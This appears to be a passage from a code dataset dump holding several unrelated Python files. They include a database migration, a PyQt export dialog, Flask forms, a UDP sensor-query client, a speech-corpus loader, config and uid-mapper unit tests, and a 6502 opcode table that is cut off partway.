content stringlengths 5 1.05M |
|---|
"""empty message
Revision ID: 1dda1de84b36
Revises:
Create Date: 2019-11-17 11:24:28.953423
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '1dda1de84b36'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('admins',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('is_deleted', sa.Boolean(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('email', sa.String(length=100), nullable=False),
sa.Column('password', sa.String(length=255), nullable=False),
sa.Column('first_name', sa.String(length=100), nullable=False),
sa.Column('last_name', sa.String(length=100), nullable=False),
sa.Column('is_lecturer', sa.Boolean(), nullable=True),
sa.Column('status', sa.Boolean(), nullable=True),
sa.Column('auth_key', sa.String(length=255), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('email')
)
op.create_table('events',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('is_deleted', sa.Boolean(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('name', sa.String(length=255), nullable=False),
sa.Column('desc', sa.Text(), nullable=True),
sa.Column('status', sa.Boolean(), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('lectures',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('is_deleted', sa.Boolean(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('event_id', sa.Integer(), nullable=True),
sa.Column('topic', sa.String(length=255), nullable=False),
sa.Column('desc', sa.Text(), nullable=True),
sa.Column('zoom_link', sa.String(length=255), nullable=True),
sa.Column('datetime', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.ForeignKeyConstraint(['event_id'], ['events.id'], )
)
op.create_table('students',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('is_deleted', sa.Boolean(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('email', sa.String(length=100), nullable=False),
sa.Column('password', sa.String(length=255), nullable=False),
sa.Column('first_name', sa.String(length=100), nullable=False),
sa.Column('last_name', sa.String(length=100), nullable=False),
sa.Column('is_verified', sa.Boolean(), nullable=True),
sa.Column('is_premium', sa.Boolean(), nullable=True),
sa.Column('status', sa.Boolean(), nullable=True),
sa.Column('auth_key', sa.String(length=255), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('email')
)
op.create_table('lecture_admins',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('is_deleted', sa.Boolean(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('lecture_id', sa.Integer(), nullable=True),
sa.Column('admin_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['admin_id'], ['admins.id'], ),
sa.ForeignKeyConstraint(['lecture_id'], ['lectures.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('student_events',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('is_deleted', sa.Boolean(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('event_id', sa.Integer(), nullable=True),
sa.Column('student_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['event_id'], ['events.id'], ),
sa.ForeignKeyConstraint(['student_id'], ['students.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('student_events')
op.drop_table('lecture_admins')
op.drop_table('students')
op.drop_table('lectures')
op.drop_table('events')
op.drop_table('admins')
# ### end Alembic commands ###
|
from PyQt5.QtCore import (Qt)
from PyQt5.QtWidgets import (QDialog, QVBoxLayout, QHBoxLayout,
QLineEdit, QLabel, QComboBox,
QCheckBox, QFrame,
QDialogButtonBox, QMessageBox)
import os
class ExportLayerAnimDialog(QDialog):
def __init__(self, exportLayerAnim, parent=None):
super(ExportLayerAnimDialog, self).__init__(parent)
self.exportLayerAnim = exportLayerAnim
self.mainLayout = QVBoxLayout(self)
self.formLayout = QHBoxLayout()
self.exportDirLineEdit = QLineEdit()
self.namePrefixLineEdit = QLineEdit()
self.exampleLabel = QLabel()
self.helpLabel = QLabel()
self.extensionComboBox = QComboBox()
self.useCompositionsBox = QCheckBox(i18n("Use compositions"))
self.firstFrameBox = QCheckBox(i18n("First frame only"))
self.buttonBox = QDialogButtonBox(
QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
self.exportDirLineEdit.textChanged.connect(self.updateLabels)
self.namePrefixLineEdit.textChanged.connect(self.updateLabels)
self.extensionComboBox.addItems(["png", "jpg"])
self.exampleLabel.setWordWrap(True)
self.exampleLabel.setTextFormat(Qt.RichText)
self.exampleLabel.setIndent(5)
self.useCompositionsBox.stateChanged.connect(self.updateLabels)
self.firstFrameBox.stateChanged.connect(self.updateLabels)
self.helpLabel.setWordWrap(True)
self.helpLabel.setTextFormat(Qt.RichText)
self.helpLabel.setText(i18n("Add the followings to layer's name:")
+ "<br/>- <code>NE</code>: " + i18n("won't be exported")
+ "<br/>- <code>EC</code>: " + i18n("export children")
)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
self.formLayout.addWidget(QLabel(i18n("Directory:")))
self.formLayout.addWidget(self.exportDirLineEdit)
self.formLayout.addWidget(QLabel(i18n("Prefix:")))
self.formLayout.addWidget(self.namePrefixLineEdit)
self.formLayout.addWidget(QLabel(i18n("Type:")))
self.formLayout.addWidget(self.extensionComboBox)
self.mainLayout.addLayout(self.formLayout)
self.mainLayout.addWidget(self.exampleLabel)
hLayout = QHBoxLayout()
hLayout.addWidget(self.useCompositionsBox)
hLayout.addWidget(self.firstFrameBox)
self.mainLayout.addLayout(hLayout)
line = QFrame()
line.setFrameStyle(QFrame.HLine | QFrame.Sunken)
self.mainLayout.addWidget(line)
self.mainLayout.addWidget(self.helpLabel)
line = QFrame()
line.setFrameStyle(QFrame.HLine | QFrame.Sunken)
self.mainLayout.addWidget(line)
self.mainLayout.addWidget(self.buttonBox)
self.setWindowTitle(i18n("Export layers & anim"))
self.resize(400, 100)
def initialize(self):
self.exportDirLineEdit.setText(self.exportLayerAnim.exportDir)
self.namePrefixLineEdit.setText(self.exportLayerAnim.namePrefix)
self.extensionComboBox.setCurrentText(self.exportLayerAnim.extension)
self.useCompositionsBox.setChecked(self.exportLayerAnim.useCompositions)
self.firstFrameBox.setChecked(self.exportLayerAnim.firstFrame)
self.updateLabels()
self.show()
self.activateWindow()
self.exec_()
def updateLabels(self):
self.exampleLabel.setText(i18n("Files path example:") + " "
+ self.exportLayerAnim.exportPath
+ ("/" + self.exportDirLineEdit.text() if self.exportDirLineEdit.text() != "" else "")
+ "/" + self.namePrefixLineEdit.text()
+ "<i>" + (i18n("Composition") if self.useCompositionsBox.isChecked() else "")
+ ("_" if self.namePrefixLineEdit.text() != "" or self.useCompositionsBox.isChecked() else "") + (i18n("Layer_Frame") if not self.firstFrameBox.isChecked() else i18n("Layer"))
+ "</i>." + self.extensionComboBox.currentText())
def accept(self):
self.exportLayerAnim.exportDir = self.exportDirLineEdit.text()
self.exportLayerAnim.namePrefix = self.namePrefixLineEdit.text()
self.exportLayerAnim.extension = self.extensionComboBox.currentText()
self.exportLayerAnim.useCompositions = self.useCompositionsBox.isChecked()
self.exportLayerAnim.firstFrame = self.firstFrameBox.isChecked()
self.exportLayerAnim.export()
QMessageBox.information(Application.activeWindow().qwindow(), i18n("Exportation done"), i18n("Files created in") + " " + self.exportLayerAnim.exportPath + " :" + self.exportLayerAnim.layersName)
super(ExportLayerAnimDialog, self).accept()
def closeEvent(self, event):
event.accept()
|
from flask_wtf import FlaskForm
from wtforms import IntegerField, StringField, SubmitField
from wtforms.validators import InputRequired, NumberRange
class NameForm(FlaskForm):
name = StringField("Full Name", validators=[InputRequired("Please add a name.")]) # add validation here
submit = SubmitField("Submit")
class NameFormSecond(FlaskForm):
name = StringField("Full Name", validators=[InputRequired()])
age = IntegerField(
"Age",
validators=[
InputRequired(),
NumberRange(min=13, max=60, message="Age must be between 13 and 60."),
],
)
submit = SubmitField("Submit")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
import sys
import json
import select
import logging
#logging.basicConfig(level=logging.DEBUG)
udpTimeout = 4
ADDR = 'heizungeg'
PORT = 5023
def getcmds():
valid_cmds = ['getTemperature',
'getHumidity',
'getPressure']
return valid_cmds
def hilf():
print('')
print('*******************************')
print('Test tool for BME280 UDP server')
print('')
print('Commands:')
print('t -> get Temperature')
print('h -> get Humidity')
print('p -> get Pressure')
print('')
print('? -> This Text')
print('q -> Quit')
def getch():
import sys, tty, termios
fd = sys.stdin.fileno( )
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(fd)
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
def tcpRemote(msg, **kwargs):
# Todo
pass
def udpRemote(msg, **kwargs):
# Setzt einen JSON-String in Richtung Ampi per UDP ab
# msg: JSON-String nach Ampi-Spec
# udpSocket: wenn da ein Socket übergeben wird, wird halt der hergenommen
# addr, port: Gibt's keinen Socket, wird einer mit addr, port aufgemacht
# Wenn nix übergeben wird, gibt's halt einen Standard-Socket
if('udpSocket' in kwargs):
udpSocket = kwargs.get('udpSocket')
else:
if('addr' not in kwargs or 'port' not in kwargs):
logging.info("Uiui, wohin soll ich mich nur verbinden? Naja, standard halt.")
addr = ADDR
port = PORT
else:
addr = kwargs.get('addr')
port = kwargs.get('port')
logging.info("Öffne Socket")
try:
udpSocket = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )
udpSocket.setblocking(0)
except Exception as e:
logging.info(str(e))
valid_cmds = getcmds()
try:
ret = -1
logging.info("So laut des heit: %s", msg)
ready = select.select([], [udpSocket], [], udpTimeout)
if(ready[1]):
udpSocket.sendto( msg.encode(), (addr,port) )
logging.info("Gesendet")
ready = select.select([udpSocket], [], [], udpTimeout)
if(ready[0]):
data, addr = udpSocket.recvfrom(1024)
logging.info(data.decode())
ret = data.decode()
return(ret)
except Exception as e:
logging.info(str(e))
return -1
def main():
#addr = 'heizung'
#port = 5005
valid_cmds = getcmds()
if len(sys.argv) == 1:
hilf()
while True:
try:
cmd = getch()
valid = 1
if cmd == "t":
json_string = '{"command" : "getTemperature"}\n'
elif cmd == "h":
json_string = '{"command" : "getHumidity"}\n'
elif cmd == "p":
json_string = '{"command" : "getPressure"}\n'
elif cmd == "?":
hilf()
elif cmd == "q":
logging.info("Bye")
break
else:
logging.info("Invalid command")
valid = 0
if valid:
ret = udpRemote(json_string, addr="heizungeg.home", port=5023)
if(ret!=-1):
try:
print(json.dumps(json.loads(ret),indent=4))
except Exception as e:
print("ups:", e)
except KeyboardInterrupt:
logging.info("Bye")
break
else:
log = "Not a valid command"
logging.info(log)
syslog.syslog(log)
return()
if __name__ == "__main__":
main()
|
"""Load the TIMIT dataset."""
import os
from scipy.io import wavfile
from python.params import MIN_EXAMPLE_LENGTH, MAX_EXAMPLE_LENGTH
from python.dataset.config import CORPUS_DIR
from python.dataset.txt_files import generate_txt
# Path to the TIMIT dataset.
__NAME = 'timit'
__FOLDER_NAME = 'timit/TIMIT'
__TARGET_PATH = os.path.realpath(os.path.join(CORPUS_DIR, __FOLDER_NAME))
def timit_loader():
"""Build the output string that can be written to the desired *.txt file.
Returns:
Tuple[str]: Tuple containing the output string that can be written to TXT file.
"""
targets = ['train', 'test']
txt_paths = []
for target in targets:
output = __timit_loader(target)
txt_paths.append(generate_txt(__NAME, target, output))
return tuple(txt_paths)
def __timit_loader(target):
"""Build the output string that can be written to the desired *.txt file.
Args:
target (str): 'train' or 'test'.
Returns:
[str]: List containing the output string that can be written to *.txt file.
"""
if not os.path.isdir(__TARGET_PATH):
raise ValueError('"{}" is not a directory.'.format(__TARGET_PATH))
if target != 'test' and target != 'train':
raise ValueError('Timit only supports "train" and "test" targets.')
# Location of timit intern .txt file listings.
train_txt_path = os.path.join(__TARGET_PATH, 'train_all.txt')
test_txt_path = os.path.join(__TARGET_PATH, 'test_all.txt')
# Select target.
master_txt_path = train_txt_path if target == 'train' else test_txt_path
if not os.path.isfile(master_txt_path):
raise ValueError('"{}" is not a file.'.format(master_txt_path))
with open(master_txt_path, 'r') as f:
master_data = f.readlines()
output = []
for line in master_data:
wav_path, txt_path, _, _ = line.split(',')
txt_path = os.path.join(__TARGET_PATH, txt_path)
# Skip SAx.WAV files, since they are repeated by every speaker in the dataset.
basename = os.path.basename(wav_path)
if 'SA1.WAV' == basename or 'SA2.WAV' == basename:
continue
with open(txt_path, 'r') as f:
txt = f.readlines()
assert len(txt) == 1, 'Text file contains to many lines. ({})'.format(txt_path)
txt = txt[0].split(' ', 2)[2]
# Absolute path.
wav_path = os.path.join(__TARGET_PATH, wav_path)
# Validate that the example length is within boundaries.
(sr, y) = wavfile.read(wav_path)
length_sec = len(y) / sr
if not MIN_EXAMPLE_LENGTH <= length_sec <= MAX_EXAMPLE_LENGTH:
continue
# Relative path to `DATASET_PATH`.
wav_path = os.path.relpath(wav_path, CORPUS_DIR)
output.append('{} {}\n'.format(wav_path, txt.strip()))
return output
|
import contextlib
import io
from typing import ContextManager, TextIO
import pytest
from synctogit import config
class MemoryConfigReadWriter(config.ConfigReadWriter):
def __init__(self, text: str) -> None:
self.file = io.StringIO(text)
@contextlib.contextmanager
def reader(self) -> ContextManager[TextIO]:
self.file.seek(0)
yield self.file
@contextlib.contextmanager
def writer(self) -> ContextManager[TextIO]:
self.file.seek(0)
self.file.truncate(0)
yield self.file
def text(self) -> str:
with self.reader() as f:
return f.read()
def test_read_config():
conf = """
[git]
repo_dir = git
push = false
num = 3
[evernote]
sandbox = true
token =
"""
read_writer = MemoryConfigReadWriter(conf)
conf = config.Config(read_writer)
assert config.StrConfigItem("git", "repo_dir").get(conf) == "git"
assert config.BoolConfigItem("git", "push").get(conf) is False
assert config.IntConfigItem("git", "num").get(conf) == 3
assert config.BoolConfigItem("evernote", "sandbox").get(conf) is True
assert config.StrConfigItem("evernote", "token").get(conf) == ""
def test_comments():
conf = """
; large comment
[git]
; comment = 1
[evernote]
sandbox = true
; token = aaa
"""
read_writer = MemoryConfigReadWriter(conf)
conf = config.Config(read_writer)
evernote_sandbox = config.BoolConfigItem("evernote", "sandbox")
git_comment = config.IntConfigItem("git", "comment")
evernote_token = config.StrConfigItem("evernote", "token")
assert evernote_sandbox.get(conf) is True
with pytest.raises(KeyError):
git_comment.get(conf)
with pytest.raises(KeyError):
evernote_token.get(conf)
def test_bool():
conf = """
[git]
a = 1
b = true
c = True
d = yes
e = 0
f = false
g = False
h = no
i = None
"""
read_writer = MemoryConfigReadWriter(conf)
conf = config.Config(read_writer)
assert config.BoolConfigItem("git", "a").get(conf) is True
assert config.BoolConfigItem("git", "b").get(conf) is True
assert config.BoolConfigItem("git", "c").get(conf) is True
assert config.BoolConfigItem("git", "d").get(conf) is True
assert config.BoolConfigItem("git", "e").get(conf) is False
assert config.BoolConfigItem("git", "f").get(conf) is False
assert config.BoolConfigItem("git", "g").get(conf) is False
assert config.BoolConfigItem("git", "h").get(conf) is False
with pytest.raises(ValueError):
assert config.BoolConfigItem("git", "i").get(conf) is False
def test_write():
conf = """
[git]
repo_dir = git
push = false
[evernote]
; comment before sandbox
sandbox = true
; comment in the end
"""
read_writer = MemoryConfigReadWriter(conf)
conf = config.Config(read_writer)
evernote_token = config.StrConfigItem("evernote", "token")
evernote_token.set(conf, "new-token")
assert evernote_token.get(conf) == "new-token"
# Unfortunately, configparser strips the comments :(
assert (
read_writer.text()
== """
[git]
repo_dir = git
push = false
[evernote]
; comment before sandbox
sandbox = true
; comment in the end
token = new-token
"""
)
evernote_token.unset(conf)
with pytest.raises(KeyError):
evernote_token.get(conf)
assert (
read_writer.text()
== """
[git]
repo_dir = git
push = false
[evernote]
; comment before sandbox
sandbox = true
; comment in the end
"""
)
config.IntConfigItem("newsect", "num").set(conf, 42)
config.BoolConfigItem("newsect", "bool").set(conf, True)
assert (
read_writer.text()
== """
[git]
repo_dir = git
push = false
[evernote]
; comment before sandbox
sandbox = true
; comment in the end
[newsect]
num = 42
bool = True
"""
)
def test_defaults():
conf = """
[git]
a = s
"""
read_writer = MemoryConfigReadWriter(conf)
conf = config.Config(read_writer)
with pytest.raises(KeyError):
config.StrConfigItem("no", "b").get(conf)
with pytest.raises(KeyError):
config.StrConfigItem("git", "b").get(conf)
with pytest.raises(KeyError):
config.IntConfigItem("git", "b").get(conf)
with pytest.raises(KeyError):
config.BoolConfigItem("git", "b").get(conf)
assert config.StrConfigItem("no", "b", "yeah").get(conf) == "yeah"
assert config.StrConfigItem("git", "b", "a-ha").get(conf) == "a-ha"
assert config.IntConfigItem("git", "b", 42).get(conf) == 42
assert config.BoolConfigItem("git", "b", True).get(conf) is True
assert config.StrConfigItem("git", "b", None).get(conf) is None
def test_isset():
conf = """
[aa]
num = 5
s = hi
"""
read_writer = MemoryConfigReadWriter(conf)
conf = config.Config(read_writer)
non_existing = config.IntConfigItem("bb", "cc")
assert not non_existing.isset(conf)
non_existing.set(conf, 6)
assert non_existing.isset(conf)
num = config.IntConfigItem("aa", "num")
assert num.isset(conf)
bad_num = config.IntConfigItem("aa", "s", 5)
with pytest.raises(ValueError):
bad_num.isset(conf)
|
#!/usr/bin/env python
# Copyright (c) 2015, Andre Lucas
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the <organization> nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import grp
import logging
import os
import pwd
import unittest
from hsync.idmapper import *
from hsync.utility import is_dir_excluded, is_path_pre_excluded
log = logging.getLogger()
class FileHashSymlinkSourceNormUnitTestcase(unittest.TestCase):
my_uid = os.getuid()
my_gid = os.getgid()
my_name = pwd.getpwuid(my_uid).pw_name
my_group = grp.getgrgid(my_gid).gr_name
def setUp(self):
self.m = UidGidMapper()
def test_obvious(self):
'''Test obvious uid and gid idmapper mappings'''
self.assertEquals(self.m.get_name_for_uid(os.getuid()), self.my_name,
"uid->name is mapped properly")
self.assertEquals(self.m.get_uid_for_name(self.my_name), self.my_uid,
"name->uid is mapped properly")
self.assertEquals(self.m.get_group_for_gid(os.getgid()), self.my_group,
"gid->group is mapped properly")
self.assertEquals(self.m.get_gid_for_group(self.my_group), self.my_gid,
"group->gid is mapped properly")
def test_nonExistentIds(self):
'''Bogus idmapper uid and gid should not cause KeyError'''
self.assertEquals(self.m.get_name_for_uid(99999), self.my_name,
"Bogus uid should not throw KeyError")
self.assertEquals(self.m.get_group_for_gid(99999), self.my_group,
"Bogus gid should not throw KeyError")
def test_nonExistentNames(self):
'''Bogus idmapper user and group should not cause KeyError'''
self.assertEquals(self.m.get_uid_for_name('bogusname'),
self.my_uid, "Bogus name should not throw KeyError")
self.assertEquals(self.m.get_gid_for_group('bogusgroup'),
self.my_gid, "Bogus group should not throw KeyError")
def test_good_defaults(self):
'''Sensible defaults are accepted and get obvious results'''
self.m.set_default_uid(self.my_uid)
self.assertEquals(self.m.default_name, self.my_name)
self.m.set_default_name(self.my_name)
self.assertEquals(self.m.default_uid, self.my_uid)
self.m.set_default_gid(self.my_gid)
self.assertEquals(self.m.default_group, self.my_group)
self.m.set_default_group(self.my_group)
self.assertEquals(self.m.default_gid, self.my_gid)
def test_bad_defaults_raise(self):
'''Bogus idmapper set_default_*()s raise exceptions'''
with self.assertRaises(KeyError):
self.m.set_default_uid(99999)
with self.assertRaises(KeyError):
self.m.set_default_gid(99999)
with self.assertRaises(KeyError):
self.m.set_default_name('madeupname')
with self.assertRaises(KeyError):
self.m.set_default_group('madeupgroup')
|
from cpu import AddressingMode
class OpCode:
def __init__(self,
code: 'u8',
mnemonic: "&'static str",
len: 'u8',
cycles: 'u8',
mode: 'AddressingMode'):
self.code = code
self.mnemonic = mnemonic
self.len = len
self.cycles = cycles
self.mode = mode
CPU_OPS_CODES = [
OpCode(0x00, 'BRK', 1, 7, AddressingMode.NoneAddressing),
OpCode(0xea, 'NOP', 1, 2, AddressingMode.NoneAddressing),
# --- Arithmetic
OpCode(0x69, 'ADC', 2, 2, AddressingMode.Immediate),
OpCode(0x65, 'ADC', 2, 3, AddressingMode.ZeroPage),
OpCode(0x75, 'ADC', 2, 4, AddressingMode.ZeroPage_X),
OpCode(0x6d, 'ADC', 3, 4, AddressingMode.Absolute),
# /*+1 if page crossed*/
OpCode(0x7d, 'ADC', 3, 4, AddressingMode.Absolute_X),
# /*+1 if page crossed*/
OpCode(0x79, 'ADC', 3, 4, AddressingMode.Absolute_Y),
OpCode(0x61, 'ADC', 2, 6, AddressingMode.Indirect_X),
# /*+1 if page crossed*/
OpCode(0x71, 'ADC', 2, 5, AddressingMode.Indirect_Y),
# ---
OpCode(0xe9, 'SBC', 2, 2, AddressingMode.Immediate),
OpCode(0xe5, 'SBC', 2, 3, AddressingMode.ZeroPage),
OpCode(0xf5, 'SBC', 2, 4, AddressingMode.ZeroPage_X),
OpCode(0xed, 'SBC', 3, 4, AddressingMode.Absolute),
# /*+1 if page crossed*/
OpCode(0xfd, 'SBC', 3, 4, AddressingMode.Absolute_X),
# /*+1 if page crossed*/
OpCode(0xf9, 'SBC', 3, 4, AddressingMode.Absolute_Y),
OpCode(0xe1, 'SBC', 2, 6, AddressingMode.Indirect_X),
# /*+1 if page crossed*/
OpCode(0xf1, 'SBC', 2, 5, AddressingMode.Indirect_Y),
# ---
OpCode(0x29, 'AND', 2, 2, AddressingMode.Immediate),
OpCode(0x25, 'AND', 2, 3, AddressingMode.ZeroPage),
OpCode(0x35, 'AND', 2, 4, AddressingMode.ZeroPage_X),
OpCode(0x2d, 'AND', 3, 4, AddressingMode.Absolute),
# /*+1 if page crossed*/
OpCode(0x3d, 'AND', 3, 4, AddressingMode.Absolute_X),
# /*+1 if page crossed*/
OpCode(0x39, 'AND', 3, 4, AddressingMode.Absolute_Y),
OpCode(0x21, 'AND', 2, 6, AddressingMode.Indirect_X),
# /*+1 if page crossed*/
OpCode(0x31, 'AND', 2, 5, AddressingMode.Indirect_Y),
# ---
# /*+1 if page crossed*/
OpCode(0x49, 'EOR', 2, 2, AddressingMode.Immediate),
OpCode(0x45, 'EOR', 2, 3, AddressingMode.ZeroPage),
OpCode(0x55, 'EOR', 2, 4, AddressingMode.ZeroPage_X),
OpCode(0x4d, 'EOR', 3, 4, AddressingMode.Absolute),
OpCode(0x5d, 'EOR', 3, 4, AddressingMode.Absolute_X),
# /*+1 if page crossed*/
OpCode(0x59, 'EOR', 3, 4, AddressingMode.Absolute_Y),
OpCode(0x41, 'EOR', 2, 6, AddressingMode.Indirect_X),
# /*+1 if page crossed*/
OpCode(0x51, 'EOR', 2, 5, AddressingMode.Indirect_Y),
# ---
OpCode(0x09, 'ORA', 2, 2, AddressingMode.Immediate),
OpCode(0x05, 'ORA', 2, 3, AddressingMode.ZeroPage),
OpCode(0x15, 'ORA', 2, 4, AddressingMode.ZeroPage_X),
OpCode(0x0d, 'ORA', 3, 4, AddressingMode.Absolute),
# /*+1 if page crossed*/
OpCode(0x1d, 'ORA', 3, 4, AddressingMode.Absolute_X),
# /*+1 if page crossed*/
OpCode(0x19, 'ORA', 3, 4, AddressingMode.Absolute_Y),
OpCode(0x01, 'ORA', 2, 6, AddressingMode.Indirect_X),
# /*+1 if page crossed*/
OpCode(0x11, 'ORA', 2, 5, AddressingMode.Indirect_Y),
# --- Shifts
OpCode(0x0a, 'ASL', 1, 2, AddressingMode.NoneAddressing),
OpCode(0x06, 'ASL', 2, 5, AddressingMode.ZeroPage),
OpCode(0x16, 'ASL', 2, 6, AddressingMode.ZeroPage_X),
OpCode(0x0e, 'ASL', 3, 6, AddressingMode.Absolute),
OpCode(0x1e, 'ASL', 3, 7, AddressingMode.Absolute_X),
# ---
OpCode(0x4a, 'LSR', 1, 2, AddressingMode.NoneAddressing),
OpCode(0x46, 'LSR', 2, 5, AddressingMode.ZeroPage),
OpCode(0x56, 'LSR', 2, 6, AddressingMode.ZeroPage_X),
OpCode(0x4e, 'LSR', 3, 6, AddressingMode.Absolute),
OpCode(0x5e, 'LSR', 3, 7, AddressingMode.Absolute_X),
# ---
OpCode(0x2a, 'ROL', 1, 2, AddressingMode.NoneAddressing),
OpCode(0x26, 'ROL', 2, 5, AddressingMode.ZeroPage),
OpCode(0x36, 'ROL', 2, 6, AddressingMode.ZeroPage_X),
OpCode(0x2e, 'ROL', 3, 6, AddressingMode.Absolute),
OpCode(0x3e, 'ROL', 3, 7, AddressingMode.Absolute_X),
# ---
OpCode(0x6a, 'ROR', 1, 2, AddressingMode.NoneAddressing),
OpCode(0x66, 'ROR', 2, 5, AddressingMode.ZeroPage),
OpCode(0x76, 'ROR', 2, 6, AddressingMode.ZeroPage_X),
OpCode(0x6e, 'ROR', 3, 6, AddressingMode.Absolute),
OpCode(0x7e, 'ROR', 3, 7, AddressingMode.Absolute_X),
# ---
OpCode(0xe6, 'INC', 2, 5, AddressingMode.ZeroPage),
OpCode(0xf6, 'INC', 2, 6, AddressingMode.ZeroPage_X),
OpCode(0xee, 'INC', 3, 6, AddressingMode.Absolute),
OpCode(0xfe, 'INC', 3, 7, AddressingMode.Absolute_X),
# ---
OpCode(0xe8, 'INX', 1, 2, AddressingMode.NoneAddressing),
OpCode(0xc8, 'INY', 1, 2, AddressingMode.NoneAddressing),
# ---
OpCode(0xc6, 'DEC', 2, 5, AddressingMode.ZeroPage),
OpCode(0xd6, 'DEC', 2, 6, AddressingMode.ZeroPage_X),
OpCode(0xce, 'DEC', 3, 6, AddressingMode.Absolute),
OpCode(0xde, 'DEC', 3, 7, AddressingMode.Absolute_X),
# ---
OpCode(0xca, 'DEX', 1, 2, AddressingMode.NoneAddressing),
OpCode(0x88, 'DEY', 1, 2, AddressingMode.NoneAddressing),
# ---
OpCode(0xc9, 'CMP', 2, 2, AddressingMode.Immediate),
OpCode(0xc5, 'CMP', 2, 3, AddressingMode.ZeroPage),
OpCode(0xd5, 'CMP', 2, 4, AddressingMode.ZeroPage_X),
OpCode(0xcd, 'CMP', 3, 4, AddressingMode.Absolute),
# /*+1 if page crossed*/
OpCode(0xdd, 'CMP', 3, 4, AddressingMode.Absolute_X),
# /*+1 if page crossed*/
OpCode(0xd9, 'CMP', 3, 4, AddressingMode.Absolute_Y),
OpCode(0xc1, 'CMP', 2, 6, AddressingMode.Indirect_X),
# /*+1 if page crossed*/
OpCode(0xd1, 'CMP', 2, 5, AddressingMode.Indirect_Y),
# ---
OpCode(0xc0, 'CPY', 2, 2, AddressingMode.Immediate),
OpCode(0xc4, 'CPY', 2, 3, AddressingMode.ZeroPage),
OpCode(0xcc, 'CPY', 3, 4, AddressingMode.Absolute),
# ---
OpCode(0xe0, 'CPX', 2, 2, AddressingMode.Immediate),
OpCode(0xe4, 'CPX', 2, 3, AddressingMode.ZeroPage),
OpCode(0xec, 'CPX', 3, 4, AddressingMode.Absolute),
# --- Branching
# //AddressingMode that acts as Immidiate
OpCode(0x4c, 'JMP', 3, 3, AddressingMode.NoneAddressing),
# //AddressingMode:Indirect with 6502 bug
OpCode(0x6c, 'JMP', 3, 5, AddressingMode.NoneAddressing),
OpCode(0x20, 'JSR', 3, 6, AddressingMode.NoneAddressing),
OpCode(0x60, 'RTS', 1, 6, AddressingMode.NoneAddressing),
OpCode(0x40, 'RTI', 1, 6, AddressingMode.NoneAddressing),
# ---
# /*(+1 if branch succeeds +2 if to a new page)*/
OpCode(0xd0, 'BNE', 2, 2, AddressingMode.NoneAddressing),
# /*(+1 if branch succeeds +2 if to a new page)*/
OpCode(0x70, 'BVS', 2, 2, AddressingMode.NoneAddressing),
# /*(+1 if branch succeeds +2 if to a new page)*/
OpCode(0x50, 'BVC', 2, 2, AddressingMode.NoneAddressing),
# /*(+1 if branch succeeds +2 if to a new page)*/
OpCode(0x30, 'BMI', 2, 2, AddressingMode.NoneAddressing),
# /*(+1 if branch succeeds +2 if to a new page)*/
OpCode(0xf0, 'BEQ', 2, 2, AddressingMode.NoneAddressing),
